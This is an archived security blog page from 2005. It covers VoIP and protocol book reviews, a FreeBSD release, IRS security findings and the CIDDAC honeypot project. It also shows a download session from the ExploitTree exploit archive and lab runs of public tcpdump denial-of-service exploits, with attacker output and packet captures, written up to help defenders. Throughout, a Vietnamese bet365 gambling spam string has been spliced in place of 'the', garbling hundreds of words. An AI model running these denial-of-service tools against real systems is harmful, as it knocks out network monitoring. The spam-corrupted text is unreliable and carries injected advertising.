Reviews of VoIP Security, The Internet and Its Protocols Posted

I refused to let April end without finishing and reviewing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se two books kindly provided by Elsevier Press. The first was a disappointment. Amazon.com just posted my three star review of VoIP Security. From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 review:

"I decided to read VoIP Security because I thought it would describe VoIP protocols and ways to secure cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. The table of contents looked very strong and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 preface seemed to meet my goals: "For one to truly understand Internet telephony, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 reader must have a solid understanding of digital voice, telephony, networking, Internet protocols, and, most important of all, how all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se technologies are put togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r." Unfortunately, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book is confusing at times and is not an improvement over earlier VoIP security books. So-called 'reviewers' who write that this book 'goes heavily into explaining cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 low level mechanics of VoIP' reveal cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y don't read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 books cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y purport to review."

Thankfully, I was very pleased to read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second book Elsevier sent me. Amazon.com just posted my five star review of Adrian Farrel's The Internet and Its Protocols. From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 review:

"Adrian Farrel's The Internet and Its Protocols (TIAIP) blew me away. I read this book because it explains cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet I know, but also how new protocols work with that Internet and make it different from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 network I first encountered over a decade ago. Farrel's amusing yet clear writing style delivers a great deal of knowledge in a hefty hardcover. If you want to learn about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 protocols that make cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet work, you need to read TIAIP."

If you want to get a handle on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new protocols appearing in your network, like Multi-Protocol Label Switching (MPLS) or Stream Control Transmission Protocol (SCTP), you should read The Internet and Its Protocols.

FreeBSD 5.4-RC4 Imminent

As I guessed recently, we should see FreeBSD 5.4 RELEASE arrive next week or very soon cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365reafter. Scott Long posted an update on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 release status of 5.4 this morning. He says:

"As you probably noticed, we are a bit behind on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 5.4 release. There was a major stability problem reported several weeks ago in a particlar high load, high profile environment, and we decided that it was in everyones best interest to get it resolved before cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 release. Well, thanks to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tireless efforts of Doug White and Stephen Uphoff and several ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bug has been found, fixed, and verified. As soon as it and a few ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r fixes get merged in, we will start cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RC4 build process and hopefully release it for testing late this weekend. After that, unless anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r show-stopper comes up, we expect to build and release 5.4-RELEASE next weekend."

I hope to test 5.4-RC4 this week, assuming it arrives tomorrow. Thanks FreeBSD release team!

SecurityForest.com ExploitTree

This afternoon I was researching a bot for a chapter in my latest book. I don't spend a lot of time on exploit sites because I am not a penetration tester by trade. I think cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last time I really looked at exploits, sites like www.hack.co.za were still around!

While searching for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bot in question, I happened to find SecurityForest.com, although cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 site was announced on BugTraq in March. SecurityForest.com is an impressive piece of work. The site is essentially a giant CVS archive of attack code, called cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ExploitTree. They provide a Client Utility, which at least for UNIX, is an interface to a native CVS client. For Windows, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y provide everything you need to access a CVS server.

Here is how a session using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ExploitTree Client Utility appears under UNIX.

 ./ExploitTree.pl anonymous

ExploitTree Client Utility Manager v0.6
----------------------------------------

1) Initialize (first time download)
2) Update Repository
3) Print Exploit Statistics
q) Quit

> 1
Password is blank (press enter), cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n wait...

Logging in to :pserver:anonymous@cvs.securityforest.com:2401/home/security/cvsroot
CVS password:
cvs login: warning: failed to open /home/richard/.cvspass for reading:
 No such file or directory
cvs server: Updating ExploitTree
U ExploitTree/_SecurityForest
U ExploitTree/_Ver
U ExploitTree/bids.txt
U ExploitTree/exploit_db.txt
U ExploitTree/xsearch.pl
U ExploitTree/xsearch2-beta.pl
cvs server: Updating ExploitTree/application
U ExploitTree/application/_SecurityForest
cvs server: Updating ExploitTree/application/_uncategorized
U ExploitTree/application/_uncategorized/0verkill-exploit.c
U ExploitTree/application/_uncategorized/0x82-GNATS_sux.c
U ExploitTree/application/_uncategorized/0x82-Remote.tannehehe.xpl.c
U ExploitTree/application/_uncategorized/0x82-libCGIfpxpl.c
U ExploitTree/application/_uncategorized/101_shixx.cpp
...edited...
U ExploitTree/system/tru64/TRU64_xkb.pl
U ExploitTree/system/tru64/_SecurityForest
Quiting...

Here's an example of what one finds when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 download process is finished.

janney:/home/richard/exploittree/ExploitTree$ ls
CVS                     bids.txt                xsearch.pl
_SecurityForest         exploit_db.txt          xsearch2-beta.pl
_Ver                    network
application             system
janney:/home/richard/exploittree/ExploitTree$ cd system/
janney:/home/richard/exploittree/ExploitTree/system$ ls
CVS             acá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365os          irix            novell          tru64
_SecurityForest beos            linux           qnx
_uncategorized  bsd             mac_osx         sco
aix             hpux            microsoft       solaris
janney:/home/richard/exploittree/ExploitTree/system$ cd bsd
janney:/home/richard/exploittree/ExploitTree/system/bsd$ ls
CVS             _SecurityForest local           remote
janney:/home/richard/exploittree/ExploitTree/system/bsd$ cd remote/
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote$ ls
CVS             animal.c        freebsd         obooptd.c       rpc.autofsd.c
_SecurityForest bsdi            netbuf.c        openbsd         stream3.c
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote$ cd freebsd/
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote/freebsd$ ls
CVS                     fbsd-DoS.c              ronin.c
DSR-cfengine.pl         fbsd-bnc.c              turkey2.c
_SecurityForest         ftpspy.c
cURL-remote-FBSD.pl     ppp.c

I chose a sparsely populated set of directories. The Microsoft section is much longer.

What's nice about this set-up is that you can synchronize your local copy of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ExploitTree with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SecurityForest.com version using CVS.

Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r helpful exploit sites include milw0rm.com and ExploitWatch, which reports on newly available exploits by linking to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m.

Cut Budgets If Security Fails to Improve?

I find this note from a recent GovExec story valuable:

"House Government Reform Chairman Tom Davis, R-Va., said Thursday [7 April] that agencies could have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir budgets cut if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir information technology security does not improve.

With several agencies struggling to meet requirements of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 2002 Federal Information Security Management Act, Davis said that compliance eventually has to be tied to funding."

This will never happen. Does Congress advocate cutting funds to poorly performing schools? Regardless of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 merits of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 approach, I can not see enough people supporting this tactic. Agencies will continue to "muddle through" until evidence of a massive intrusion becomes public. I hope that day never arrives, though.

Join Me at USENIX Security 05

You may have noticed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new banner at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 top of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Blog showing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 14th USENIX Security Symposium in Baltimore, MD, 31 July - 5 August 2005. I presented a one day NSM tutorial at USENIX Security 04 in San Diego, CA last year, and an improved version of that course at USENIX 05 in Anaheim, CA two weeks ago.

In Baltimore this summer, I will be presenting Network Security Monitoring with Open Source Tools on 31 July, followed by my brand-new Network Incident Response tutorial on 1 August. Descriptions for each class are available via cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 provided links. I am really looking forward to offering cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se classes, especially with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MD-DC-VA crowds in attendance. These are both day-long classes.

If you register before 11 July, one day will cost $625 and two days will cost $1200 (for non-students). USENIX offers discounts if five or more people from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same organization attend.

I plan to create a proposal for a network forensics class, and submit it along with my NSM and network IR tutorials for Large Installation System Administration (LISA) conference in December in San Diego, CA. If you would like to see such a class, please contact cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 training coordinator and let him know!

What's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 difference between network IR and network forensics? The network IR class is more about reacting to, containing, and remediating intrusions. It's similar to firefighting. The network forensics class covers collecting, preserving, analyzing, presenting (perhaps to a jury), and defending (under cross-examination) network evidence. The forensics angle concentrates on ensuring your investigation is sound and could support a successful prosecution or human resources action, if necessary.

IR and forensics subjects are often taught from a host-centric perspective, so I believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is room for network-focused tutorials.

Two More Pre-Reviews

Two new books arrived at TaoSecurity world headquarters this week to be added to my reading queue. The first is Silence on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Wire by Michal Zalewski. This looks like a creative and unconventional look at digital security, although cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book's subtitle is "A Field Guide to Passive Reconnaissance and Indirect Attacks." Michal was kind enough to email me to ask if I would review his book. You may recognize Michal for some of his work, like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 P0f tool or his really cool TCP sequence number analysis.

The second book is Python Cookbook, 2nd Ed by Alex Martelli, Anna Ravenscroft, and David Ascher. This new edition covers Python 2.3 and 2.4. I consider this book anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r piece of my Python education program, which I plan to start in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next month or so. This book is helpful because it presents over 300 problems, code solutions, and discussions of those problems. Assuming cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 code is good, Python programmers will not have to reinvent cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wheel if a problem cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y face is similar to one in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book. I think this sort of "solid code reuse plan" makes a lot of sense.

If you're wondering why you haven't see any recent book reviews, I'm working my way through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 excellent The Internet and Its Protocols by Adrian Farrel. It's an 800 page protocol text, so it's taking a while. I also read everything I review, unlike some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r reviewers with higher Amazon rankings!

Sources of Free Security Market Research

This morning I was looking for security market research and I came across two useful resources. First, CSO Online provides an Analyst Report section with summaries of research by all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 big name firms. For example, you can read about Symantec Gains Added Vendor Neutrality with New IPS Support by Current Analysis or Deciphering cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Dual Meaning of Compliance Monitoring by Forrester. These are not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 full articles, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is enough cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re to make for interesting reading.

I also found some good press releases on security research from Infonetics Research. These include:

• Growing IP/MPLS Investments Planned as
  Carriers Transform Their Data Networks


• Service Providers Banking on Integrated Security Services


• Network Security Market Up 30% to $3.7B in 2004


• Large Companies Lose 2%–16% of Annual Revenue to Network Downtime; Finance and Manufacturing Bleeding cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Most


• ISS and Cisco Tie for Lead in IDS/IPS Market, Prevention Drives Market Growth

The last article's chart is revealing. It appears in-line "IPS" platforms are set to have a greater revenue share in 2005 than network IDS for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first time. I am not finding this surprising. When I looked this morning to find cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "leading" IDS or IPS solutions, I created this list:

• Cisco 4200 Series IPS, which appears to have replaced cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cisco Secure IDS


• ISS Proventia IPS


• 3Com's TippingPoint, which is a leader according to this recent press release


• McAfee Intrushield Network IPS


• Sourcefire, which just integrated IPS via snort_inline

What would you add to this list? If you were to take a next-generation course on IDS/IPS and network security monitoring, what products would you want to try, hands-on, in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 class?

Internal Revenue Service Hassling You? Cite Security Issues

I filed my taxes a few weeks ago. Now I read in Techweb and Reuters that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internal Revenue Service's security is horrible. According to Andy Sullivan of Reuters:

"Security flaws in computer systems used by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internal Revenue Service expose millions of taxpayers to potential identity cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ft or illegal police snooping, according to a congressional report released today.

The IRS also is unlikely to know if outsiders are browsing through citizens' tax returns because it doesn't effectively police its computer systems for unauthorized use, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Government Accountability Office found."

Greg Keizer writes even more disturbing findings:

"The GAO, for instance, found that nearly 7,500 mainframe users, which included IRS employees, independent contractors, and non-IRS government employees, all have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ability to access and even change 'sensitive taxpayer' data.

Lack of ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r security controls and wide-open access privileges mean that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IRS might not even know if an identity breach has occurred, said cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 GAO."

The Government Accounting Office (GAO) report is available in .pdf form here.

It sounds like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IRS cannot account for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 integrity of its data. If that is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 case, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y cannot be sure if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 information entered by an e-Filer is what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 taxpayer actually entered. They cannot be sure of anything unless cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y have a paper record or duplicate, separate electronic record protected by alternate means. I guess it was a good idea for me to submit paper records to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IRS -- as long as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are available for review.

Cyber Incident Detection and Data Analysis Center Goes Public

In October 2003 I reported on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cyber Incident Detection & Data Analysis Center (CIDDAC), a collaboration of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 University of Pennsylvania's Institute of Strategic Threat Analysis and Response (ISTAR) laboratory in Philadelphia, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Philadelphia InfraGard chapter, and Charles "Buck" Fleming, CEO of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 apparently dormant AdminForce LLC. Details in 2003 were sparse, but I was skeptical that companies would agree to host "what CIDDAC calls Real-time Cyber Attack Detection Sensors, or RCADS, throughout as many U.S. companies as possible — and eventually cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world — and feed incident data to a centrally managed operations facility at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 University of Pennsylvania at Philadelphia."

Stories by Infoworld and Computerworld are shedding some light on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 situation. First, it does not appear CIDDAC will watch company traffic. Instead, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are just deploying honeypots:

"John Chesson, a special agent at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FBI in Philadelphia, said cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RCADS are essentially 'hardened honeypots' that look like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 network an intruder is trying to enter. When cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RCADS are attacked, CIDDAC workers monitor cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 event and collect real-time data that can be forwarded to law enforcement officials, he said."

I found this comparison chart interesting. It allegedly shows how CIDDAC is superior to ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r data collection methods.

I wonder what metrics CIDDAC used to determine cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 width of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 colored bars for a competing organization, like CERT? It must be a Philly vs. Pittsburgh issue.

Check this out:

"The initial 30 participants, who are anonymous for security reasons, will pay about $10,000 for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 installation of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RCADs and for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first year of monitoring and reports.

'We take minutes to analyze what now takes hours,' Fleming said. 'We know it's going to work. We've had prototypes working for years now.'"

According to reporting, CIDDAC is DHS funded:

"The pilot project, which has been in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 planning stages for two years, is being funded through a $200,000 grant from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 DHS Science and Technology Directorate and with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 support of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FBI."

The CIDDAC FAQ offers cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se details:

"CIDDAC has received its initial funding and construction is underway at our University of Pennsylvania facility. The build-out, setup and testing estimated completion date is no later than October 2005. CIDDAC services will be available by December 2005. 3."

I'll keep my eye on this project. I would be interested in speaking with anyone from CIDDAC who would like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 project profiled here. It seems CIDDAC is a honeypot-based managed security services provider that charges $10,000 per year, has start-up funding from DHS, and works with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Philadelphia FBI and U Penn. Am I wrong?

Tcpdump Vulnerabilities

I learned of four vulnerabilities in Tcpdump found by Vade79 by checking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest exploits at Packet Storm. Linking to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploits cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are:

xtcpdump-ldp-dos.c: Tcpdump 3.8.3 and below mishandles Multi-Protocol Label Switching (MPLS) Label Distribution Protocol (LDP) packets. The effect is a local denial of service to Tcpdump. No system needs to be listening to port 646 TCP for Tcpdump to be affected.

If you run xtcpdump-ldp-dos, it looks like this to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker:

./xtcpdump-ldp-dos 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] destination : 192.168.1.1
[*] amount      : 5

[+] sending(packet = .): .....

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CLI without cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -v switch:

 Unknown Message (0x7fff), length: 0, Message ID:
 0xffffffff, Flags: [continue processing if unknown]
 Unknown Message (0x7fff), length: 0, Message ID:
 0xffffffff, Flags: [continue processing if unknown]
...continues...

If you add cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -v switch, you see this:

09:09:02.092665 IP (tos 0x0, ttl  64, id 41668, offset 0,
 flags [none], length: 46) 192.168.1.5.52016 > 192.168.1.1.646:
 [udp sum ok] 
        LDP, Label-Space-ID: 255.255.255.255:65535, length: 18
          Unknown Message (0x7fff), length: 0, Message ID: 
           0xffffffff, Flags: [continue processing if unknown]
          0x0000:  0402 6ee0 7042 0e6a 0100 4600 0000 4600
          0x0010:  0000 1200 0030 4841 f956 00c0 9f3f 4fc5
          0x0020:  0800 4500 0038 917f 0000 4001 65ef c0a8
          0x0030:  0101 c0a8 0105 0303 2f2c 0000 0000 4500
          0x0040:  002e a2c4 0000 4011 54a4 c0a8 0105 c0a8
          0x0050:  0101 cb30 0286 001a 0000 6ee0 7042 3b53
          0x0060:  0200 3c00 0000 3c00 0000 1200 00c0 9f3f
          0x0070:  4fc5 0030 4841 f956 0800 4500 002e a2c5
          0x0080:  0000 4011 54a3 c0a8 0105 c0a8 0101 cb31
          0x0090:  0286 001a aeaa 0001 ffff ffff ffff ffff
          0x00a0:  ffff 0000 ffff ffff 1e38 6ee0 7042 4953
          0x00b0:  0200 4600 0000 4600 0000 1200 0030 4841
          0x00c0:  f956 00c0 9f3f 4fc5 0800 4500 0038 9180
          0x00d0:  0000 4001 65ee c0a8 0101 c0a8 0105 0303
          0x00e0:  2f2b 0000 0000 4500 002e a2c5 0000 4011
          0x00f0:  54a3 c0a8 0105 c0a8 0101 cb31 0286 001a
          0x0100:  0000 6ee0 7042 783d 0300 3c00 0000 3c00
          0x0110:  0000 1200 00c0 9f3f 4fc5 0030 4841 f956
...continues...

Here is how Snort sees cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic. Only one packet is shown.

04/28-09:07:30.928973 192.168.1.5:52016 -> 192.168.1.1:646
UDP TTL:64 TOS:0x0 ID:41668 IpLen:20 DgmLen:46
Len: 18
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00  ...?O..0HA.V..E.
0x0010: 00 2E A2 C4 00 00 40 11 54 A4 C0 A8 01 05 C0 A8  ......@.T.......
0x0020: 01 01 CB 30 02 86 00 1A AE AB 00 01 FF FF FF FF  ...0............
0x0030: FF FF FF FF FF FF 00 00 FF FF FF FF              ............

Here is sample traffic for you to try: ldp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -r option without killing Tcpdump.

xtcpdump-bgp-dos.c: Tcpdump 3.8.3 and below mishandles Border Gateway Protocol (BGP) packets. The effect is a local denial of service to Tcpdump. A system watched by Tcpdump needs to be listening on port 179 TCP for Tcpdump to be affected. I simulated this by having Netcat listen on port 179 TCP.

If you run xtcpdump-bgp-dos.c, it looks like this to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker:

./xtcpdump-bgp-dos.c 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] target: 192.168.1.1
[*] attempting to connect...
[*] successfully connected.
[*] sending malformed BGP data. (34 bytes)
[*] closing connection.

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CLI:

tcpdump -n -i em1 -s 1515 -v

tcpdump: listening on em1, link-type EN10MB (Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rnet), capture size 1515 bytes
09:04:48.530004 IP (tos 0x0, ttl  64, id 37797, offset 0,
 flags [DF], length: 60) 192.168.1.5.57471 > 192.168.1.1.179:
 S [tcp sum ok] 2061108147:2061108147(0) win 65535
 

09:04:48.530039 IP (tos 0x0, ttl  64, id 30686, offset 0,
 flags [DF], length: 60) 192.168.1.1.179 > 192.168.1.5.57471:
 S [bad tcp cksum 8385 (->b9d4)!] 2753925437:2753925437(0)
 ack 2061108148 win 65535 
 timestamp 207951117 145837700>

09:04:48.530250 IP (tos 0x0, ttl  64, id 37798, offset 0, 
 flags [DF], length: 52) 192.168.1.5.57471 > 192.168.1.1.179:
 . [tcp sum ok] ack 1 win 33304 <>
 145837700 207951117>

09:04:49.031589 IP (tos 0x0, ttl  64, id 37800, offset 0, 
 flags [DF], length: 87) 192.168.1.5.57471 > 192.168.1.1.179:
 P [tcp sum ok] 1:36(35) ack 1 win 33304 <>
 145837751 207951117>: BGP, length: 35
        Update Message (2), length: 19
          Withdrawn routes: 1 bytes
          Multi-Protocol Reach NLRI (14), length: 255,
           Flags [OTPE+f]: 
            AFI: IPv4 (1), vendor specific SAFI: Route Target
             Routing Information (132), no SNPA
            (illegal prefix length)
            (illegal prefix length)
...continues...

Here is how Snort sees cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic. Although cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 entire session is shown, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fourth packet is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 killer.

04/28-09:03:17.383320 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37797 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7ADA03B3  Ack: 0x0  Win: 0xFFFF  TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 145837700 0 
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00  ...?O..0HA.V..E.
0x0010: 00 3C 93 A5 40 00 40 06 23 C0 C0 A8 01 05 C0 A8  .<..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B3 00 00 00 00 A0 02  ......z.........
0x0030: FF FF 10 BB 00 00 02 04 05 B4 01 03 03 01 01 01  ................
0x0040: 08 0A 08 B1 4E 84 00 00 00 00                    ....N.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383581 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30686 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xA425913D  Ack: 0x7ADA03B4  Win: 0xFFFF  TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 207951117 145837700 
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00  .0HA.V...?O...E.
0x0010: 00 3C 77 DE 40 00 40 06 3F 87 C0 A8 01 01 C0 A8  .<>
0x0020: 01 05 00 B3 E0 7F A4 25 91 3D 7A DA 03 B4 A0 12  .......%.=z.....
0x0030: FF FF B9 D4 00 00 02 04 05 B4 01 03 03 01 01 01  ................
0x0040: 08 0A 0C 65 15 0D 08 B1 4E 84                    ...e....N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383646 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37798 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03B4  Ack: 0xA425913E  Win: 0x8218  TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837700 207951117 
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00  ...?O..0HA.V..E.
0x0010: 00 34 93 A6 40 00 40 06 23 C7 C0 A8 01 05 C0 A8  .4..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 10  ......z....%.>..
0x0030: 82 18 63 81 00 00 01 01 08 0A 08 B1 4E 84 0C 65  ..c.........N..e
0x0040: 15 0D                                            ..

